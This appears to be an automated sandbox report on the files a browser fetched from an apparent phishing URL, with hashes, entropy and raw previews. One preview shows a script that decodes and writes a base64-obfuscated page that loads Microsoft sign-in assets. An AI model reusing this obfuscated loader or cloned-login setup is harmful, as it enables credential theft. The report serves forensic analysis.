                                                  Preview:...........R]..Gv}.(..u.C.p...!=.hG.x..I..o$..P....X....$>........,...A....0. @`.........U.Mv7.#.11....=..{.?.Dh.....7.~.L..F..x...jJ......C.YQB8..$..*.& ...a.f..L..I.1y.<_..lL|.HA.K.[.dG..Bhv.[d...S.e?.....Z.R.!..Zm....'.....".u.j.._......n..Ej...j3a...V..`A.(J.d...nRA...vTAB...x.d..,..r...]..i#Z...!.Q^^.~.7.....'.&S......1}..V%f.[.._.Y..I.G._5....c d.....(.MF.v...._p..:....Z.;p.......].b...,.XU..u@Qh...D.?_v...;.wo.|zy..2lo.h....R.bd..N...w}.E6.5I......+.'.=.....l.`....[.......,.~./...I0...n./...'...ZN...}8;.r..~....#!.S........X..`qb.d....5.....*....Q...N..K.t....e...|v...?|.......;...X..qW....w.^..x....R....^......wW.....%.../1D... ....q...Z..1e...QU..i.KI~.........9..@."i/..`&tn...L .;.....A..8..K..,).a2%...r...=L...B...TDr..o.w;6...4..o..;u..-.R].).l=....).0.=...S:.....D......QC.d..~v......../.F..P....dZ.._.R....Z..M.._S.M.+....r...:.C.E)..7...|n.3E...S.%.....9wHT..D....j7..g...j....4.]..8w......2..g1..L.M...&a..F2.& L..9.`..\.DEU...0[.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                  Category:dropped
                                                  Size (bytes):122515
                                                  Entropy (8bit):7.997419459076181
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:AC9A6ED508328361A4C9530325A94076
                                                  SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                  SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                  SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with very long lines (7517), with CRLF line terminators
                                                  Category:downloaded
                                                  Size (bytes):19844
                                                  Entropy (8bit):5.873353814080126
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:60B275FDC950747E09DBB718F0F47F64
                                                  SHA1:6C96FEB71E2791CCE14BAD77E17AE160BB6848AE
                                                  SHA-256:BD68150DB3BB1C3C56382A47C91EAF2D39820973D51A89130DCDFFC56EA0E84D
                                                  SHA-512:B365632874BD7F2B0C6D49C27AB290563EDF988F24D732F7F6678E28C247EF19764C833F1B97E9139E606339C1BAD4FFB38585B61A27734506AE5929C10756EB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://reprise.repriseyes.ru/ri0M/
                                                  Preview: Success is the sum of small efforts, repeated day in and day out. -->....<script>....if(atob("aHR0cHM6Ly9yZXByaXNlLnJlcHJpc2V5ZXMucnUvcmkwTS8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQo
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (47520)
                                                  Category:dropped
                                                  Size (bytes):47521
                                                  Entropy (8bit):5.3981340461317835
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:7C92EC9D1395055CE0405A32607C7291
                                                  SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                  SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                  SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65447)
                                                  Category:downloaded
                                                  Size (bytes):81920
                                                  Entropy (8bit):5.293062475393336
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B94669C6A4A12277D275E10502CF5276
                                                  SHA1:6610E669BC3E3C7835D659CF9C006C976D4F65C9
                                                  SHA-256:7F72A96A5323D2C37102A26E41631B501EB3B30EA20984604BA5E7A4EDFA571F
                                                  SHA-512:80E78B8F7E878B626E692CF457B7AC78F7A424EC6EC08AF408621847FE18687F0464A846D0C2C90CFA36458BA5329277ABC7E4E211986B62591235DF1914EC4D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format (Version 2), TrueType, length 74256, version 329.-17761
                                                  Category:downloaded
                                                  Size (bytes):74256
                                                  Entropy (8bit):7.996875020662388
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:418DAD87601F9C8ABD0E5798C0DC1FEB
                                                  SHA1:A6B003EF506E92D05CDE73ADF67487D7FD7EC6DF
                                                  SHA-256:F18C486A80175CF02FEE0E05C2B4ACD86C04CDBAECEC61C1EF91F920509B5EFE
                                                  SHA-512:99B9741F2A1C1D50E011C934C2445B07D9460F320EE60132B87D6594E9D91DBF3436849AE4745E29C58AD77846DA5AC3F3C5BEED8389CF8A8177C1E47F1AA8F6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://use.fontawesome.com/releases/v5.8.1/webfonts/fa-solid-900.woff2
                                                  Preview:wOF2......"........H..!..I......................?FFTM....`........D..;.6.$..,..0.. ..%..m[&A....._...Ve....-:.....'..m.j...x..zm.....oJ.2....$...Q[....n.Q.../.:..To&.a..C....f.|1;#...1..(i!k....../4...Zk......z...`0B)..t&2"2".!"....W..LF..FD&...>l6e.^P.o...O.P............e..*...~.\.y...".$xrK;..........$6.i..f.+.$*Q.JT.....=.!.@}Y+nu5O.9.o<.szI...Tl.:G..x$...>M.K/O6...Typuw....4.q\0.F.i...n.4.>.....>.n......16.V/...{..K...{=w....09@.....11....h...z..Ye6.o.Up...+.[E3.....E.b~...y....a.*...Q.]|Y...g..0...Mh...lhK.K...N.....W...Fk..,81...Z..<.q&.j3..-A.....9$B...w)...A`.....Ad.....m......Vj.l.=.....d...z....{).V..;.%`})9...B`.N.O.O..W9....3....N.9.oB.t,...1....i./J...x...,..i.T.U...w..9.f5..l.....F..X.JL.n.....I.}Y...1.h............I..0.....X.p..'...yE.R...:..K..v...r..).h.x"s.f.......@.X..p.z.9.{....Z...Cly.3...ese..b"..A.....>.}K..!.r...@.P.......x...?..{.=..4..1i...h.lk."......d.{i..I ..?.3.4{6rI.[.ZX.R.`....+..(..r.....!.^.x.>../.K.*]..j...@`.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):96
                                                  Entropy (8bit):5.218997042938778
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9872BE83FA60DA999B65A3BD481731D3
                                                  SHA1:B59A8688C6A0D5311C6410A0D91537084E148F2D
                                                  SHA-256:5DEE42A8D755847C0813D4E5F033F51197B20DD3C6C2EE4FBE31FD27B2F593D3
                                                  SHA-512:53E947C87386ECF19E3B36E3F292A9757911F0F8B02FE36DDFC0DD74A3C784D97B15066AB4895EA694F66792A8C7CF525F59A03868FF5D5F0C3B5203D34C5F7D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                  Preview:CkYKDQ3RW1FSGgQIVhgCIAEKNQ1Xevf9GgQISxgCKigIClIkChpAISMuKiQtXyslJj8vPV4pKCw6O348JyJcXRABGP////8P
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                  Category:dropped
                                                  Size (bytes):621
                                                  Entropy (8bit):7.673946009263606
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4761405717E938D7E7400BB15715DB1E
                                                  SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                  SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                  SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                  Category:dropped
                                                  Size (bytes):35170
                                                  Entropy (8bit):7.993096534744333
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:171A4DD9400708B88724B57D62B24A6A
                                                  SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                  SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                  SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                  Category:downloaded
                                                  Size (bytes):17174
                                                  Entropy (8bit):2.9129715116732746
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:12E3DAC858061D088023B2BD48E2FA96
                                                  SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                  SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                  SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                  Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                  Category:dropped
                                                  Size (bytes):16345
                                                  Entropy (8bit):7.98960525258912
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                  SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                  SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                  SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                  Category:downloaded
                                                  Size (bytes):673
                                                  Entropy (8bit):7.6596900876595075
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:0E176276362B94279A4492511BFCBD98
                                                  SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                  SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                  SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                  Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:gzip compressed data, from Unix, original size modulo 2^32 3902
                                                  Category:downloaded
                                                  Size (bytes):1250
                                                  Entropy (8bit):7.816225760513578
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:A62BA2C8083EFD2A4FDB52DB7C54EB6A
                                                  SHA1:144F4D5D2F8642CC5EB85AB3EFCC3A614B8E1328
                                                  SHA-256:A90B7FD270BB2D4693D2287F413CB8C2736673D20CB0C7391E700C27588AC387
                                                  SHA-512:E92996B05F70AC5C3DAA3E163506DD9BAD73612020CD63608604B63B1059DDB85CBE48A5980070332FD2A259FEAC9BCD95503C4C954FFAE04CB2CA890D9CE2C9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://gfsouto.com.br/cgi-documents/disk/slidercaptcha.css
                                                  Preview:...........R.n.8.}.Wp.,...+....S.M.>......J.Jl(. )..b.}..u.%N.....9g.9.Jw........z..."M....w.z.t&...k.".mD. ..M).f-.^...M.=.ThH.Px9Q.*.@&EVRa.0x.........|G.....c.<eZUe..R.\.|...;..BH.Q.jXi..-....A0Z...l..@..|..|......gL.i..........S.....r.V$.|..&.V.&'....G.C....s....L....Y.....wE...+7..]\Lc..'..Z..H.b..Zht..m.U...]N.N.._...%}.....J..Y3..k`O...m..5..h.+..c~.[..EJt.....}..ly..90lnWfi*.,"......?L).X....ah.`..j.....ZV.ZZ.x..:.F....3.......$....#k....4&...Z.:.W.J..Sd...4."b.UV.U..r7.....D.....,Xo............,.......I.<...<\..r.Y..}....Y.......o.;...r..y7....e..<..Q\+#.P........8.../:.......8...X.V..T.1.8k....^YOM.G.y......O..$...p.V_.\....)......z.g.S....&F..F..U.p..._.y.g...M....D...*I.._f....}.=)lsL~..Zi.J.*.ENC....N.......".%..........S..7.. H......,%_^.kv:...Y)../.x./...W.|..9..."....l.3.D..k.<Ra.."R...$....V....(\e..D......\....r<Z..^....j.>..+.....G.k...Dd6.....P...WobO...!'.yKhKM.R..V.........&..M.WMoRi.R.V....feK.. .!.mb...#..._bRd%..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):61
                                                  Entropy (8bit):3.990210155325004
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                  Category:downloaded
                                                  Size (bytes):20410
                                                  Entropy (8bit):7.980582012022051
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                  SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                  SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                  SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                  Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:GIF image data, version 89a, 352 x 3
                                                  Category:downloaded
                                                  Size (bytes):2672
                                                  Entropy (8bit):6.640973516071413
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:166DE53471265253AB3A456DEFE6DA23
                                                  SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                  SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                  SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                  Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                  Category:dropped
                                                  Size (bytes):5525
                                                  Entropy (8bit):7.961202222662501
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                  SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                  SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                  SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                  Malicious:false
                                                  Reputation:unknown
